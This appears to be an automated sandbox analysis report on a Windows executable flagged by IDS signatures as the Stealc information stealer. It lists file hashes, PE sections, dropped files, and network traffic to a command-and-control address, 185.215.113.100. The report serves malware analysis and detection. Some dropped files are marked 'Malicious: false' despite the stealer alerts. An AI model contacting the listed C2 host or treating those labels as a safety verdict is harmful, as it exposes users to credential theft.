                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):80880
                                  Entropy (8bit):6.920480786566406
                                  Encrypted:false
                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                  MD5:A37EE36B536409056A86F50E67777DD7
                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):32768
                                  Entropy (8bit):0.017262956703125623
                                  Encrypted:false
                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                  Malicious:false
                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):32768
                                  Entropy (8bit):0.017262956703125623
                                  Encrypted:false
                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                  Malicious:false
                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.945102321158745
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'793'024 bytes
                                  MD5:9ee7d1fb0f1e8a7a998da096b4da22a9
                                  SHA1:11cf686cb71ea7fbde2c0448ddd1f12ab44a393e
                                  SHA256:7394adbf1fe4a07aa08d1e7d25c10b28994eb7eb8671b8ef767c349b5b44c37d
                                  SHA512:8ad5940613076e0ec4a55de21d21473ea73c2fe55c61b7c1b9ab444028290e1c987ac458dc59cd7356a692cf725eb285099be22cdf678d00f42a2bf23642ab1b
                                  SSDEEP:49152:QpmlJkbrv8l4VUJbL7Ly9QhXNe1A0KatPa+gB:QKJGQCVszqQHR0ja+U
                                  TLSH:6985331E9A149E78C31B15BD9E33C7476338E2A400DAD5C13CC5766C6A3D36626EACF8
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xa88000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007FD0005255EAh
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x23f0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x23f1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x23d0000x13c0087fdb6486025e788abff0a2eee2251f1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x23e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x23f0000x10000x200380655991303f284fcb90ef8e49522a1False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2400000x2a80000x20082a8582e0ff5517baca4cad0120be7d7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  trzlrlhz0x4e80000x19f0000x19e60096189baf9b0e392f06ad717ba442a939False0.9949077347285068data7.953821840467499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  xbmoezwd0x6870000x10000x400812cad17731eb6d4c4a37b48607cc35cFalse0.7421875data6.018712394805536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6880000x30000x2200583a113b96311a78a43271cce5eb6282False0.07628676470588236DOS executable (COM)1.0002716602602695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  DLLImport
                                  kernel32.dlllstrcpy
                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                  2024-08-30T00:48:01.527095+0200TCP2044248ET MALWARE Win32/Stealc Submitting System Information to C214970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:00.047505+0200TCP2044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config18049704185.215.113.100192.168.2.5
                                  2024-08-30T00:48:10.755871+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:00.291547+0200TCP2044246ET MALWARE Win32/Stealc Requesting plugins Config from C214970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:02.061081+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:12.452365+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:08.158058+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:10.036605+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:00.041454+0200TCP2044244ET MALWARE Win32/Stealc Requesting browsers Config from C214970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:12.906494+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  2024-08-30T00:47:59.792672+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14970480192.168.2.5185.215.113.100
                                  2024-08-30T00:48:00.298577+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config18049704185.215.113.100192.168.2.5
                                  2024-08-30T00:48:09.396625+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 30, 2024 00:47:58.672013044 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:58.689693928 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:47:58.689945936 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:58.690099955 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:58.697518110 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:47:59.513787985 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:47:59.513849974 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:59.529089928 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:59.533914089 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:47:59.792609930 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:47:59.792671919 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:59.793852091 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:47:59.798654079 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.041354895 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.041373014 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.041454077 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.042754889 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.047504902 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291481018 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291528940 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291538954 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291547060 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.291567087 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291570902 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.291580915 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291593075 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.291604996 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.291634083 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.292505980 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.292558908 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.292591095 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.292632103 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.293819904 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.298577070 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.540582895 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.540654898 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.558813095 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.558847904 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:00.564436913 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.564455986 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.564471006 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.564795017 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.564804077 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.565320015 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:00.565329075 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:01.526921034 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:01.527095079 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:01.811342955 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:01.816356897 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.060964108 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061080933 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.061115026 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061129093 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061170101 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.061342955 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061355114 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061367035 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.061393023 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.061414957 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.062030077 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062079906 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.062087059 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062099934 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062131882 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.062899113 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062911034 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062921047 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.062947989 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.062968016 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.322633028 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322657108 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322715044 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322721004 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.322727919 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322738886 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322752953 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322762966 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.322763920 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.322767973 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322808981 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.322829962 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322841883 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322853088 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.322921038 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323002100 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323015928 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323026896 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323031902 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323043108 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323046923 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323056936 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323061943 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323075056 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323076010 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323091984 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323111057 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323276043 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323293924 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323314905 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323337078 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323342085 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323350906 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323363066 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323374987 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323375940 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323395014 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323410034 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323575020 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323594093 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323606968 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.323623896 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.323657036 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.360923052 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.360990047 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361036062 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361078978 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361200094 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361248016 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361267090 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361279964 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361306906 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361324072 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361329079 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361365080 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361862898 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361908913 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361911058 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361922979 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.361944914 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.361960888 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.362377882 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.362423897 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.362431049 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.362445116 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.362468958 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.362483025 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.362528086 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.362572908 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.363158941 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363171101 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363182068 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363204956 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.363234997 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.363296986 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363343000 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.363934040 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363964081 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363976955 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.363984108 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364005089 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364016056 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364043951 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.364084005 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364716053 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.364763021 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364772081 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.364784956 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.364814043 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364824057 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.364859104 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.364902020 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.365550041 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.365613937 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.365622997 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.365639925 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.365658045 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.365674019 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.365711927 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.365755081 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.366403103 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.366415024 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.366426945 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.366451025 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.366476059 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.366482019 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.366518974 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.367259979 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.367305040 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.367304087 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.367321968 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.367341995 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.367342949 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.367362022 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.367382050 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.367971897 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.368016005 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.368207932 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.368254900 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.368285894 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.368299007 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.368329048 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.368333101 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.368367910 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.369071960 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.369085073 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.369096041 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.369112015 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.369132996 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.369138956 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.369178057 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.369812012 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.369878054 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.526916027 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527163982 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527174950 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.527178049 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527189970 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527201891 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527210951 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.527214050 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527232885 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527240038 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.527244091 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527256966 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527267933 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:02.527292013 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:02.527312040 CEST4970480192.168.2.5185.215.113.100
